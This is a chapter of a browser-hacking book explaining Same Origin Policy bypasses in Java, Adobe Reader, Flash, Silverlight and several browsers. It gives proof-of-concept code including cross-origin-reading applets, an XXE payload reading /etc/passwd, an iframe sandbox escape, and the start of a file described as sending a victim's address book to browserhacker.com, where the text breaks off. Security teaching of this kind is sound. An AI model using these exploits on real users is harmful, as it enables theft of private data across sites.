The Browser Hacker’s Handbook (2014)

Chapter 4. Bypassing the Same Origin Policy

The Same Origin Policy (SOP) is possibly the most important security control enforced on the web. Unfortunately, it is also one of the most inconsistently implemented specifications. If the SOP is broken, or bypassed, the central security model of the World Wide Web is also broken.

The intention of the SOP is to restrict interaction between interfaces of unrelated origins. The SOP dictates that if the origin http://browserhacker.com wants to access information from http://browservictim.com, it can’t. Of course, depending on which browser is used, or which browser plugin is used, this is not always so simple.

Various SOP bypasses are analyzed in this chapter. Because the SOP is a very critical component in browser security, many of these bypasses will have been patched by the time you read this book. Still, there is a lot to research, and it’s not unusual for a new bypass to be constructed by modifying a previous one.

When you employ an SOP bypass, it’s often possible to use the hooked browser as an HTTP proxy to access origins different from the one initially hooked. Yes, it sounds weird, but you will see how this is actually possible in this chapter.

Understanding the Same Origin Policy

The SOP deems pages to be of the same origin if they share the same hostname, scheme and port. If any of these three attributes differs, the resource resides in a different origin. Hence, resources served from the same hostname, scheme and port can interact without restriction.
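To make the comparison concrete, the following minimal JavaScript sketch (not from the original text; the helper functions and example URLs are ours, and it uses the URL constructor available in current browsers) reduces a URL to its scheme, hostname and port, and compares two URLs the way most browsers do:

function origin(u) {
  // Parse the URL and normalize the port to the scheme default
  var a = new URL(u);
  var port = a.port || (a.protocol === 'https:' ? '443' : '80');
  return a.protocol + '//' + a.hostname + ':' + port;
}
function sameOrigin(u1, u2) {
  return origin(u1) === origin(u2);
}
sameOrigin('http://browserhacker.com/a', 'http://browserhacker.com:80/b'); // true
sameOrigin('http://browserhacker.com/', 'https://browserhacker.com/');     // false: scheme differs
sameOrigin('http://browserhacker.com/', 'http://www.browserhacker.com/');  // false: hostname differs
sameOrigin('http://browserhacker.com/', 'http://browserhacker.com:8080/'); // false: port differs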

The SOP was initially only defined for external resources, but was extended to include other types of origins. This included access to local files using the file scheme and browser-related resources using the chrome scheme.

Let’s consider the following analogy to demonstrate the necessity for this policy. Imagine a hospital. All patients within the hospital initially are admitted from external origins. The hospital may contain many patients at any given time, all unrelated. If any given patient in the hospital makes a request to the hospital staff to receive medical records or the status of other patients, they will be denied (and possibly with repeated aggressive attempts, admitted to another kind of hospital!). Similarly, if random members of the public make requests of the hospital to either visit or inquire about the status of any patients, the hospital will check to ensure they are closely related—of the same family or origin—before allowing access.

Now imagine a hospital that allowed unfettered interaction between its patients, the data it held about the patients and anybody from the outside world as well! This is the browser without the SOP.

Actually, it gets more complicated than that. For example, there is an SOP for XMLHttpRequest, DOM access and cookies. There are even separate SOPs for various plugins like Java, Flash and Silverlight, each demonstrating its own quirks and interpretations. When you consider these variances, you can begin to grasp the difficulty a defender has with trying to secure an origin.

If that wasn’t enough, there are legitimate reasons for web applications to communicate to different origins. Some of these cross-origin communication techniques were explored in Chapter 3, including XHR polling, the WebSocket protocol, window.postMessage() functions and DNS channels. The following sections will explore some more examples of techniques web applications use to communicate cross-origin.
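As a reminder of what sanctioned cross-origin messaging looks like, the following sketch (the frame id, origins and message contents are only illustrative) uses window.postMessage() between two subdomains, with the receiver validating the sender's origin before replying:

// On http://store.browservictim.com: send a message to a frame
// that hosts content from http://login.browservictim.com
var frame = document.getElementById('loginFrame');
frame.contentWindow.postMessage('token-please', 'http://login.browservictim.com');

// On http://login.browservictim.com: accept messages only from the store origin
window.addEventListener('message', function (event) {
  if (event.origin !== 'http://store.browservictim.com') return; // ignore everyone else
  event.source.postMessage('here-is-a-token', event.origin);
}, false);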

Understanding the SOP with the DOM

When determining whether JavaScript and other dynamic content can access the DOM of another page, three portions of the URL are compared: the hostname, the scheme and the port. If two pages share the same hostname, scheme and port, then DOM access is granted. The only exception (for DOM access) is Internet Explorer, which only validates the hostname and scheme before determining access.

This works well when all scripting is under one origin. However, in many cases there may be another host within the same root domain that should have access to the source page’s DOM. One example might be a series of sites that use a central authentication server. For instance, store.browservictim.com may need to leverage authentication through login.browservictim.com.

In this case, the sites can use the document.domain property to allow other sites within the same root domain to interact with the DOM. To allow the code from login.browservictim.com to interact with the forms on store.browservictim.com, the developer would need to set the document.domain property to the root of the domain (on both sites):

document.domain = "browservictim.com"

Once this is set in the DOM, the SOP is relaxed to the root of the domain. This means that anything in the browservictim.com domain can access the DOM in the current page. There are a few restrictions to setting these values, however. Once the SOP is relaxed down to the root domain, it can’t be restricted again.

To see this in action, you can try setting the document.domain property to the root of the domain and then try to restrict it again. Opening the SOP to include the root domain will be allowed; however, when trying to set it back, an error will be generated:

// current domain: store.browservictim.com
document.domain = "browservictim.com"; // Ok

// current domain: browservictim.com
document.domain = "store.browservictim.com"; // Error

Before relaxing the SOP this way, it’s important to make sure the developers understand all of the implications. If this was a production environment, and someone put wikidev.browservictim.com on the Internet, weaknesses in this new site may pose a risk to the store.browservictim.com origin. If an attacker were able to upload malicious code due to unpatched weaknesses, then the wikidev site would have the same level of access as the login site. This could expose information, or lead to XSS, XSRF, or other types of attacks.

Understanding the SOP with CORS

By default, if you use an XMLHttpRequest object (XHR) to send a request to a different origin, you can’t read the response. However, the request will still arrive at its destination. This is a very useful characteristic of cross-origin requests, and will be discussed in Chapters 9 and 10 as part of a number of attack techniques.

The SOP prevents you from reading the HTTP response headers or body. One of the ways to relax the SOP and allow cross-origin communication with XHR is using Cross-origin Resource Sharing (CORS). If the browserhacker.com origin returns the following response headers, then every subdomain of browservictim.com can open a bidirectional communication channel with browserhacker.com:

Access-Control-Allow-Origin: *.browservictim.com
Access-Control-Allow-Methods: OPTIONS, GET, POST
Access-Control-Allow-Headers: X-custom
Access-Control-Allow-Credentials: true

The first header is self-explanatory; the others specify that requests can be made using any of the OPTIONS, GET or POST methods, and may optionally include the custom X-custom header. Note also the Access-Control-Allow-Credentials header, which is responsible for allowing authenticated communication to a resource. This is demonstrated in the following code snippet:

var url = 'http://browserhacker.com/authenticated/user';
var xhr = new XMLHttpRequest();
xhr.open('GET', url, true);
xhr.withCredentials = true;
xhr.onreadystatechange = do_something;
xhr.send();

The preceding example retrieves the /authenticated/user resource. In this instance it required credentials for access. The JavaScript enabled authentication support by setting the withCredentials flag to true.

Understanding the SOP with Plugins

In theory, if a plugin is served from http://browserhacker.com:80/, it should only have access to http://browserhacker.com:80/. In practice, things are not that simple. As you will learn throughout this chapter, there are many SOP implementations in Java, Adobe Reader, Adobe Flash and Silverlight, but most of them are inconsistent and have suffered from different bypasses in the past.

Every major browser plugin implements the SOP in its own way. For instance, some versions of Java consider two different domains to have the same-origin if the IP is the same. This might have devastating results in virtual hosting environments that often host multiple websites from the same IP address.

Adobe has a long history of critical security bugs in its PDF Reader and Flash plugins. Most of those bugs allowed execution of arbitrary code, so the security risk was much higher than that of an SOP bypass. However, SOP bypasses have affected both plugins too.

Adobe Flash offers a method to allow you to manage cross-origin communication. This is performed through a file named crossdomain.xml, which should exist in the root of the website. The file has content similar to the following:

<?xml version="1.0"?>

<cross-domain-policy>

<site-control permitted-cross-domain-policies="by-content-type"/>

<allow-access-from domain="*.browserhacker.com" />

</cross-domain-policy>

With such a policy, every subdomain of browserhacker.com can achieve two-way communication with the application.

Java and Silverlight SOPs can be relaxed in a similar way, because crossdomain.xml is supported by both of these plugins. Silverlight also supports clientaccesspolicy.xml. When a cross-origin request is issued, Silverlight first checks for this file and, if it’s not found, falls back to crossdomain.xml. Both plugins have their quirks, as you will learn in the following sections.

Understanding the SOP with UI Redressing

UI redressing, in simple terms, is an attack methodology category that changes visual elements in a user interface in order to conceal malicious activities. Overlaying a visible button with an invisible submit button that performs a malicious action, or changing the cursor to move or click independently from where a user actually intends, are both UI redressing attacks. Multiple UI redressing attacks have been successfully exploited in the wild, targeting Facebook and other popular websites, as you will discover later in this chapter.

UI redressing attacks bypass the SOP in different ways. Some of these (now patched) attacks relied on the fact the SOP wasn’t enforced when performing drag&drop actions from the main window to IFrames, between IFrames and between windows. Other attacks rely on the SOP not being enforced under certain conditions while requesting view-source content.

Understanding the SOP with Browser History

Retrieving the browser history can be potentially devastating for the privacy of an end user. While most of the attacks targeting the user’s privacy are covered in Chapter 5, some examples of browser history attacks are covered in this chapter too.

Some of these attacks rely on classic SOP implementation flaws, such as an http scheme having access to other schemes (for example, browser, about or mx). These attacks worked on Avant and Maxthon, two lesser-known browsers that happen to be very popular in China.

Other more sophisticated attacks involve catching SOP violation errors while loading cross-origin resources. These attacks are useful in unveiling sites the browser has visited previously.
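One simple variant of this kind of cross-origin probing is sketched below. It is not a specific attack from this book: the endpoint is hypothetical, and the idea is only that the success or failure of loading a cross-origin resource (observed through onload and onerror, since the content itself cannot be read) leaks information about the target’s browsing state:

// Probe a cross-origin resource that behaves differently depending on
// whether the victim has visited (and authenticated to) the target site.
// The URL below is purely hypothetical.
function probe(url, onPositive, onNegative) {
  var img = new Image();
  img.onload = onPositive;   // the response was a valid image
  img.onerror = onNegative;  // the response was something else (e.g. a login page)
  img.src = url;
}

probe('http://socialnetwork.example/avatar_redirect',
  function () { console.log('victim appears to have an active session'); },
  function () { console.log('victim appears not to be logged in'); });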

Exploring SOP Bypasses

The SOP has been interpreted differently by all kinds of developers. This complexity and varied interpretation will work to your advantage when attacking the browser.

One way to expand your attacking opportunities is by finding a way around the SOP. It will allow you to use the victim browser as a liberal pivot point to launch further attacks, not only to the Internet, but also to intranets and even potentially to the local file system.

The following sections will demonstrate methods in which the SOP can be bypassed through browser plugins, browser quirks, or even through third-party applications. This is in no way an extensive list of every single SOP bypass, but acts as a primer for some of the more common bypasses and methods that have been successful. Once the basics have been covered, additional ways to leverage SOP bypasses will be covered in Chapters 6, 7 and 8.

Bypassing SOP in Java

Java versions 1.7u17 and 1.6u45 don’t enforce the SOP if two domains resolve to the same IP. That is, if browserhacker.com and browservictim.com resolve to the same IP, a Java applet can issue cross-origin requests and read the responses.

Reviewing the Java 6 and 7 documentation, specifically the equals method of the URL object,1 uncovers the following statement: “Two hosts are considered equivalent if both host names can be resolved into the same IP addresses […].” Obviously, this is a vulnerability in Java’s SOP implementation (which was unpatched at the time of writing). The bug is critical when exploited in virtual hosting environments where potentially hundreds of domains are managed by the same server and resolve to the same IP.

Consider the following scenario where www.browserhacker.com and www.browservictim.com resolve to the same IP address 192.168.0.2:

$ cat /etc/hosts
192.168.0.2 www.browservictim.com
192.168.0.2 www.browserhacker.com

In the following Java applet, when the getInfo() method is called, it creates a new instance of the java.net.URL object, which is used to retrieve content from a specific URL hosted on www.browserhacker.com:

import java.applet.*;
import java.awt.*;
import java.net.*;
import java.util.*;
import java.io.*;

public class javaAppletSop extends Applet{

  public javaAppletSop() {
    super();
    return;
  }

  public static String getInfo(){
    String result = "";
    try {
      URL url = new URL("http://www.browserhacker.com" +
        "/demos/secret_page.html");
      BufferedReader in = new BufferedReader(
        new InputStreamReader(url.openStream()));
      String inputLine;
      while ((inputLine = in.readLine()) != null)
        result += inputLine;
      in.close();
    }
    catch (Exception exception){
      result = "Exception: " + exception.toString();
    }
    return result;
  }
}

Now compile the previous applet and embed it in an HTML page on www.browservictim.com. Next, open the page with Firefox using the Java plugin version 1.6u45 or 1.7u17. You can use the following HTML to embed the applet:

<html>
<!--
Tested on:
- Java 1.7u17 and Firefox (CtP allowed)
- Java 1.6u45 and IE 8
-->
<body>
<embed id='javaAppletSop' code='javaAppletSop'
  type='application/x-java-applet'
  codebase='http://browservictim.com/' height='0'
  width='0' name='javaAppletSop'></embed>
<!-- use the following one for IE -->
<!--
<applet id='javaAppletSop' code='javaAppletSop'
  codebase='http://browservictim.com/' height='0'
  width='0' name='javaAppletSop'></applet>
-->
<script>
// 5 secs timeout to wait for the user to allow CtP
function getInfo(){
  output = document.javaAppletSop.getInfo();
  if (output) alert(output);
}
setTimeout(function(){getInfo();},5000);
</script>
</body>
</html>

In the pop-up in Figure 4-1, you can see the content of demos/secret_page.html correctly retrieved from www.browserhacker.com, which Java doesn’t consider a different origin from www.browservictim.com.

Figure 4-1: Unsigned applet is able to retrieve content cross-origin.


An important consideration here concerns the privileges required by the applet to use the URL, BufferedReader and InputStreamReader objects. With Java 1.6 a normal unsigned applet is enough, and no user intervention is required to run the applet (except in the latest browser versions where all unsigned applets require user intervention to run). With Java 1.7, the applet will need explicit user permission to run, resulting in a mandatory user intervention to accept its execution by clicking the Run button.

This is due to changes in the applet delivery mechanism implemented by Oracle in Java 1.7 from update 11 in early 2013. Now the user must explicitly use the Click to Play feature to run signed and unsigned applets. The initial implementation of this new feature was bypassed by Immunity2 and led to a subsequent patch by Oracle. Additionally, from Java 7u21, Oracle has updated3 the Click to Play security dialog box to differentiate the message displayed to the user based on the type of applet.

Still, from the end-user perspective, the difference between two signed applets running on Java versions greater than 7u21, where one is sandboxed and one is not, comes down to a single word.4 If the signed applet is requesting privileges to run outside the sandbox, the message displayed to the user will be “…will run with unrestricted access…”. If the signed applet is sandboxed, the message will be “…will run with restricted access…”. You can clearly see the subtle difference between the messages. The real question here is how many users will notice the difference? Nonetheless, Click to Play effectively nullifies Java as a stealthy SOP bypass option.

Mario Heiderich discovered a Java quirk when the LiveConnect5 API and Java plugin are available in Firefox. LiveConnect makes a Packages DOM object available in Firefox 15 and earlier. This object allows you to call Java objects and methods directly from the DOM. An example of the bypass using the Packages DOM object is the following:

<script>
var url = new Packages.java.net.URL("http://browservictim.com/cookie.php");
var is = new Packages.java.io.BufferedReader(
  new Packages.java.io.InputStreamReader(url.openStream()));
var data = '';
while ((l = is.readLine()) != null) {
  data += l;
}
alert(data);
</script>

When this Java code is called using Packages, there is a potentially dangerous side effect. If the code is executed under Java 1.7 using Firefox 15 or earlier, the previously discussed Click to Play feature is entirely bypassed. If the browser is Firefox, and the LiveConnect API is enabled, the silent nature of this behavior effectively increases the usefulness of Java applets for SOP bypass purposes.

Another interesting SOP bypass bug in Java is CVE-2011-3546, patched after ten months in late 2011. A similar SOP bypass was found in Adobe Reader, and is discussed in the next section. Neal Poole discovered6 that if the resource used to load an applet was replying with a 301 or 302 redirect, the applet’s origin was evaluated as the source of the redirection, and not the destination. Consider the following code:

<applet
  code="malicious.class"
  archive="http://browservictim.com?redirect_to=http://browserhacker.com/malicious.jar"
  width="100" height="100"></applet>

You would rightly expect the SOP to be enforced if the applet tries to access browservictim.com. Of course, an SOP violation error should be thrown in this situation too. This is how a non-flawed SOP implementation should behave, because the origin of the applet is browserhacker.com. Instead, Java versions 1.7 and 1.6 update 27 (and prior versions) considered the source of the redirection as the valid origin. In practice, this means you could read the content of every origin affected by an Open Redirection vulnerability. The applet would load from the redirection destination (which is an attacker’s controlled website) and the redirection source is the victim’s origin (vulnerable to Open Redirection).

Frederik Braun7 discovered another interesting SOP bypass in Java version 1.7 Update 5 and earlier, which Oracle subsequently addressed in Java 1.7 Update 9. The bypass involved Java’s URL object (also used in the previous examples) blacklisting the usage of URI schemes like ftp and file for cross-origin requests. The jar scheme was permitted though, which allowed you to create a perfectly valid URI like:

jar:http://browserhacker.com/secret.jar

These jar URIs could be used when creating a new instance of the URL object. The SOP was not enforced in this case, so an unsigned Java applet loaded from browserhacker.com could request JAR files from different origins, effectively reading the contents.

The impact of this SOP bypass was not just limited to JAR files. The JAR format is essentially a ZIP file with a manifest and a META-INF directory inside. Microsoft Office and OpenOffice document formats are also ZIP-based, which means you can use this SOP bypass to read any docx, odt, jar, and generally any ZIP-based archive file cross-origin.

The following code can be used to read the contents of an Open Office document using the SOP bypass previously discussed:

import java.awt.*;
import java.applet.Applet;
import java.io.*;
import java.net.*;

public class zipSopBypass extends Applet {

  private TextArea ltArea = new TextArea("", 100, 300);

  public void init (){
    add(ltArea);
  }

  public void paint (Graphics g) {
    g.drawString("Reading file content in JAR...", 80, 80);
    // the applet is loaded from
    // the http://browserhacker.com origin
    String url = "jar:https://browservictim.com/" +
      "stuff/confidential.odt!/content.xml";
    String content = "";
    try{
      URL u = new URL(url);
      BufferedReader ff = new BufferedReader(
        new InputStreamReader(u.openStream())
      );
      while (ff.ready()){
        content += ff.readLine();
      }
    }catch(Exception e){
      g.drawString("Error", 100, 100);
    }
    ltArea.setText(content);
    g.drawString(content, 100, 100);
  }
}

Note that the url variable in the previous code points to the content.xml resource contained inside the odt archive. Every OpenOffice document contains a content.xml resource.

Almost all the Java SOP bypasses described in the previous pages have been patched by Oracle. However, according to security companies like WebSense8 and Bit9,9 the majority of enterprises still use old and vulnerable versions of Java. Around July 2013, Bit9 collected Java usage statistics from almost 400 organizations using Bit9’s software reputation service. In total, approximately 1 million enterprise endpoint systems were surveyed. About 80 percent of those systems used Java 6. In those environments, it was still possible to run unsigned applets without user intervention.

The Click to Play security control has been introduced in the latest browsers and in Java itself. You may expect this to stop your ability to employ Java applets in your browser hacking. In fact, although it will slow you down, it won’t necessarily stop you. Don’t forget that Internet Explorer 9 and below do not implement Click to Play. Also, according to the Bit9 survey, 93 percent of organizations had multiple versions of Java installed on the same machine. This means there is still plenty of opportunity to use Java during your browser hacking: on systems with multiple versions of Java you can target the older versions, and you can target browsers that don’t employ the Click to Play control.

Figure 4-2: Java security bug time line from 2012 to mid-2013.


The widespread presence of the Java plugin makes it a perfect target for attackers. Eric Romang summarized a time line of Java zero days that led to arbitrary code execution, as displayed in Figure 4-2.10 Whilst these are not SOP bypasses, the time line is suggestive of what you can expect in the future.

Bypassing SOP in Adobe Reader

Adobe Reader is infamous for the number of security bugs that have been found in its browser plugin. There is a seemingly countless number of arbitrary code execution bugs caused by such classical problems as overflows and Use After Free vulnerabilities.11 Attacking Adobe Reader more directly will be covered in the “Attacking PDF Readers” section of Chapter 8, but it’s important to understand how flaws within the plugin can help bypass the SOP.

As you may know, the Adobe Reader PDF parser understands JavaScript.12 This capability is often used by malware to hide malicious code inside PDFs.

One of the flaws that allowed bypassing of the SOP is CVE-2013-0622, discovered by Billy Rios, Federico Lanusse, and Mauro Gentile. The attack (now patched in Adobe Reader versions greater than 11.0.0) was similar to the second SOP bypass discussed previously in the Java section, where exploiting an open redirect allowed a foreign origin to access the origin of the redirect. Here too, a request that returns a 302 redirect response code is used to exploit the vulnerability. Another interesting aspect of the bug is that the SOP was not enforced when specifying a resource using an XML External Entity (XXE).

Conventional XXE injection involves trying to inject malicious payloads into requests that accept XML input, such as the following:

<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "/etc/passwd" >]><foo>&xxe;</foo>

If the XML parser allows external entities, the value of &xxe; is then replaced with the contents of /etc/passwd. The same technique can be used to bypass the SOP. It involves loading the resource as an external entity, with the server replying with a 302 redirect. The real resource you want to retrieve is the target of the redirection. Consider the following JavaScript code snippet, which is contained in a PDF file:

var xml="<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>

<!DOCTYPE foo [ <!ELEMENT foo ANY> <! ENTITY xxe

SYSTEM \"http://browserhacker.com?redirect=

http%3A%2F%2Fbrowservictim.com%2Fdocument.txt\">]>

<foo>&xxe;</foo>";

var xdoc = XMLData.parse(xml,false);

app.alert(escape(xdoc.foo.value));

When the PDF is loaded, the preceding JavaScript code is executed. A GET request is sent to browserhacker.com, which replies with an HTTP 302 response, redirecting to the value of the redirect parameter. This results in document.txt (from browservictim.com) being retrieved and parsed.

The origin http://browserhacker.com should not have access to content in the http://browservictim.com origin. This is clearly a security flaw in the Adobe Reader SOP implementation, because only resources from the same origin the PDF was loaded from should be readable. In this case, you’re reading a resource from a different origin than the one the PDF was loaded from. Exploiting this bug has a limitation, though, which generally applies to XXE injection bugs: the resource to be retrieved needs to be either a plain text or XML document; otherwise, the XML parser will throw an error.

Bypassing SOP in Adobe Flash

Adobe Flash utilizes the crossdomain.xml file. As with other plugins, this file controls which origins can read data from the site that serves it. While the policy should be restricted to only trusted sites, it is still common to find liberal crossdomain.xml policy files. The following is an example:

<?xml version="1.0"?>

<cross-domain-policy>

<site-control permitted-cross-domain-policies="by-content-type"/>

<allow-access-from domain="*" />

</cross-domain-policy>

By setting the allow-access-from domain attribute to a wildcard, a Flash object loaded from any origin can send requests to, and read responses from, the domain that serves such a liberal policy.

Ensuring the domain attribute is limited to only trusted hosts is critically important, because otherwise every hooked browser can achieve two-way communication with the affected application using Flash. Additional attacks are covered in detail in the (proxying the) “Browser through Flash” section of Chapter 9.
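A quick way to check for such a liberal policy is sketched below (the target host is an example, and the XHR read of the policy file will itself only succeed if the file is fetched from the same origin, through a CORS-enabled response, or via a server-side request):

// Retrieve a site's Flash policy file and flag a wildcard entry.
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://browservictim.com/crossdomain.xml', true);
xhr.onreadystatechange = function () {
  if (xhr.readyState !== 4 || xhr.status !== 200) return;
  var doc = new DOMParser().parseFromString(xhr.responseText, 'text/xml');
  var entries = doc.getElementsByTagName('allow-access-from');
  for (var i = 0; i < entries.length; i++) {
    if (entries[i].getAttribute('domain') === '*') {
      console.log('Liberal policy: Flash objects from any origin can read this site');
    }
  }
};
xhr.send();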

Bypassing SOP in Silverlight

Microsoft’s Silverlight plugin uses the same SOP principle as Flash. To achieve the same cross-origin communication, the site would publish a file called clientaccesspolicy.xml containing the following:

<?xml version="1.0" encoding="utf-8"?>

<access-policy>

<cross-domain-access>

<policy>

<allow-from>

<domain uri="*"/>

</allow-from>

<grant-to>

<resource path="/" include-subpaths="true"/>

</grant-to>

</policy>

</cross-domain-access>

</access-policy>

It’s important to note the difference between the Flash and Silverlight implementations of cross-origin communication. Silverlight doesn’t segregate access between different origins based on scheme and port, unlike Flash and CORS. As a consequence, Silverlight will consider http://browserhacker.com and https://browserhacker.com to be the same origin.13

This introduces a significant issue because it creates a bridge from HTTP to HTTPS. If you can get your malicious content in over HTTP it will then have access to (potentially sensitive) content secured via HTTPS.

Bypassing SOP in Internet Explorer

Internet Explorer hasn’t been without an SOP bypass either. One example is with Internet Explorer versions prior to 8 Beta 2 (including IE 6 and 7). These browser versions were vulnerable to an SOP bypass14 in their implementation of document.domain. The flaw was quite easy to exploit, as demonstrated by Gareth Heyes.15 It consisted of simply overriding the document object and then the domain property.

The following code snippet demonstrates this vulnerability:

var document;
document = {};
document.domain = 'browserhacker.com';
alert(document.domain);

If you try to run this code in the latest browsers, you will notice an SOP violation error in the JavaScript console. However, it will work in the older versions of Internet Explorer. By leveraging this code as part of XSS, you have the ability to open up the SOP to create bi-directional communication with other origins.

Bypassing SOP in Safari

Within the SOP, different schemes are handled as different origins. Therefore http://localhost is treated as a different origin from file://localhost. One would understandably think the SOP is enforced equally across schemes. Well, as you will see in this section, there are a few notable exceptions with the file scheme, which is usually considered to be a privileged zone.

The Safari browser, from 200716 to the current (at the time of this writing) 6.0.2 version, does not enforce the SOP when a local resource is accessed. If you happen to get JavaScript execution within Safari, you can try to trick the user into downloading and opening a local file. Combining this vulnerability with a carefully crafted social-engineering e-mail lure with an attached malicious HTML file will be enough to abuse this situation. When the attached HTML file is opened using the file scheme, the JavaScript code contained within can bypass the SOP and start two-way communications with different origins. Consider the following page:

<html>
<body>
<h1> I'm a local file loaded using the file:// scheme </h1>
<script>
xhr = new XMLHttpRequest();
xhr.onreadystatechange = function (){
  if (xhr.readyState == 4) {
    alert(xhr.responseText);
  }
};
xhr.open("GET",
  "http://browserhacker.com/pocs/safari_sop_bypass/different_orig.html");
xhr.send();
</script>
</body>
</html>

When the page is loaded using the file scheme, the XMLHttpRequest object is able to read the response after requesting different_orig.html from browserhacker.com. In Figure 4-3, you can see the result of this behavior, where the content of the retrieved page is added to an alert dialog box.

Figure 4-3: The content from the cross-origin resource is correctly retrieved if the JavaScript code is loaded using the file: scheme.


Conversely, if you try to load the same page with a different scheme, for instance http, you will notice that the alert dialog box will be empty.

Bypassing SOP in Firefox

One of the more interesting SOP bypasses in Firefox was discovered by Gareth Heyes in October 2012.17 The bug was so serious that Mozilla decided to remove the ability to download Firefox 16 from their servers until the bug was fixed.18 As previous versions were not vulnerable, it’s assumed that the bug was introduced as part of the upgrade, but was not detected through regression testing in Firefox 16. The flaw resulted in unauthorized access to the window.location object outside the constraints of the SOP. Here is the original Proof of Concept (PoC) from Heyes:

<!doctype html>
<script>
function poc() {
  var win = window.open('https://twitter.com/lists/', 'newWin',
    'width=200,height=200');
  setTimeout(function(){
    alert('Hello '+/^https:\/\/twitter.com\/([^/]+)/.exec(
      win.location)[1])
  }, 5000);
}
</script>
<input type=button value="Firefox knows" onclick="poc()">

Executing the previous code from an origin you control (for example, browserhacker.com) while also being authenticated to Twitter in a different tab will launch the attack. It will open a new window that loads https://twitter.com/lists. Twitter then automatically redirects to https://twitter.com/<user_id>/lists (where user_id is your Twitter handle). After 5 seconds, the exec function parses the window.location object with the regex (here’s the bug, as it shouldn’t be accessible cross-origin). This results in the Twitter handle being displayed in the alert box.

Sandboxed IFrames

With HTML5, a new IFrame attribute was introduced: sandbox. The aim of this new attribute was to have a more granular and secure way to use IFrames, while limiting the potential harm of third party content embedded from different origins.

The sandbox attribute value can be zero or more of the following keywords: allow-forms, allow-popups, allow-same-origin, allow-scripts and allow-top-navigation.

Around August 2012, Firefox introduced support for HTML5 sandboxed IFrames. Braun discovered that when using allow-scripts as the value of the IFrame sandbox attribute, rogue JavaScript from the IFrame content could still access window.top. This resulted in the possibility of changing the outer window location:

<!-- Outer file, bearing the sandbox -->
<iframe src="inner.html" sandbox="allow-scripts"></iframe>

The framed code was:

<!-- Framed document, inner.html -->
<script>
// escape sandbox:
if(top != window) { top.location = window.location; }
// all following JavaScript code and markup is unrestricted:
// plugins, popups and forms allowed.
</script>

This was possible without the need to specify the additional keyword allow-top-navigation, and allowed JavaScript code loaded inside an IFrame to change the location of the outer window. An attacker could use this to redirect the user to a malicious website, effectively hooking the victim browser.

Bypassing SOP in Opera

If you look at Opera’s change logs19 for the stable release version 12.10, you will notice various security bug fixes. One of these patches20 is an SOP bypass discovered by Heyes.21 The bug relies on the fact that Opera was not properly enforcing the SOP when overriding prototypes, in this case when overriding the constructor of an IFrame location object. Consider the following code:

<html>
<body>
<iframe id="ifr" src="http://browservictim.com/xdomain.html"></iframe>
<script>
var iframe = document.getElementById('ifr');
function do_something(){
  var iframe = document.getElementById('ifr');
  iframe.contentWindow.location.constructor.prototype.__defineGetter__
    .constructor('[].constructor.prototype.join=' +
      'function(){console.log("pwned")}')();
}
setTimeout("do_something()",3000);
</script>
</body>
</html>

Following is the content framed from a different origin:

<html>
<body>
<b>I will be framed from a different origin</b>
<script>
function do_join(){
  [1,2,3].join();
  console.log("join() after prototype override: "
    + [].constructor.prototype.join);
}
console.log("join() before prototype override: "
  + [].constructor.prototype.join);
setTimeout("do_join();", 5000);
</script>
</body>
</html>

The framed code is printing to the console the value of [].constructor.prototype.join, which is the native code used when join() is called on an array. After 5 seconds, the join() method is called on the [1,2,3] array, and the printing function used previously is called again. The second call shows the difference, after the join() prototype has been overridden. If you have a look back at the first snippet of code, you can see where the join() prototype gets overridden inside the do_something() function. Let’s focus again on the following code from the first code snippet:

iframe.contentWindow.location.constructor.prototype.__defineGetter__
  .constructor('[].constructor.prototype.join=' +
    'function(){console.log("pwned")}')();

Note that you can call iframe.contentWindow.location.constructor without any SOP violation errors. This is a broken behavior, because the SOP should be enforced. Chrome, for instance, would throw an SOP violation error, as shown in Figure 4-4.

Figure 4-4: Chrome SOP violation error when trying to access the constructor


Going a step further, you want to check if you can actually execute code after prototype overriding is done. In Figure 4-5 you can see that you can execute code, for instance return 5+20, but the available actions are limited. Even the alert() function cannot be used and generates a security error.

Figure 4-5: Security error when trying to perform restricted actions


Heyes also discovered an SOP bypass by overriding prototypes using literal values, which were not filtered by Opera. Taking the array literal value of [], and doing prototype overriding on the join() method with the following instructions, it’s possible to execute arbitrary code each time the framed content calls the join() method on any array:

[].constructor.prototype.join=function(){your_code};

To show the SOP bypass in action, get the code from https://browserhacker.com. Then host the two code snippets on two different origins, and open the Opera 12.02 console. The console output will be the same as Figure 4-6.

Figure 4-6: Overriding the join() function in Opera


There is a prerequisite for using this bypass: only frameable websites can be targeted. Therefore, origins that use X-Frame-Options or frame-busting code are out of the scope of this SOP bypass. Another consideration worth mentioning is that you can override any prototypes using literal values, not only the Array.join() method. You can override, for instance, toString() in the following way:

"".constructor.prototype.toString=function(){alert(1)}

In a real attack you might want to frame a resource, possibly an authenticated one where session cookies are already stored in the browser, and use this SOP bypass to read the content of the framed resource. The framed resource will mostly contain private data of the user, because the valid session cookies are used when loading the resource.

Consider a situation where the target browser has two tabs open in Opera: one of them is the hooked tab (you control) and the second one is the target’s authenticated origin. If you create an IFrame with the src being the authenticated origin (in the hooked tab), you can read the IFrame’s content. This means you will be able to access any sensitive information that resides in the target’s authenticated origin.

The result of such an attack would be reading the content of a cross-origin resource and effectively bypassing the SOP.

Bypassing SOP in Cloud Storage

Issues with enforcing the SOP aren’t just limited to browsers and their plugins. In 2012 a number of cloud storage services were also found to have SOP bypass weaknesses, including Dropbox 1.4.6 on iOS and 2.0.1 on Android,22 and Google Drive 1.0.1 on iOS.23 These services store and synchronize local files to the cloud so that they are available on any other device where the Dropbox or Google Drive clients are installed.

Roi Saltzman discovered a bug similar to the Safari SOP bypass covered in the previous section. This bug impacted both Dropbox and Google Drive. The attack relies on the loading of a file in a privileged zone, such as:

file:///var/mobile/Applications/APP_UUID

If you are able to trick the target into loading an HTML file through the client application, the JavaScript code contained in the file will be executed. The fact that the file is loaded in a privileged zone allows JavaScript access to the local file system of the mobile device. Note that enforcing the SOP here is flawed by design. Because the malicious HTML file is loaded using the file scheme, nothing prevents JavaScript from accessing another file such as:

file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb

This SQLite database contains the user’s address book on iOS. Of course, this file must be accessible by the application. If the target application denies file access outside of the application scope, you can still retrieve cached files, etc. Access resulting from this kind of vulnerability will be largely dependent on the vulnerable application.

If you trick a target that uses either the vulnerable Dropbox or Google Drive clients into opening the following malicious file, the contents of the user’s address book will be sent to browserhacker.com:

<html>
<body>
<script>
local_xhr = new XMLHttpRequest();
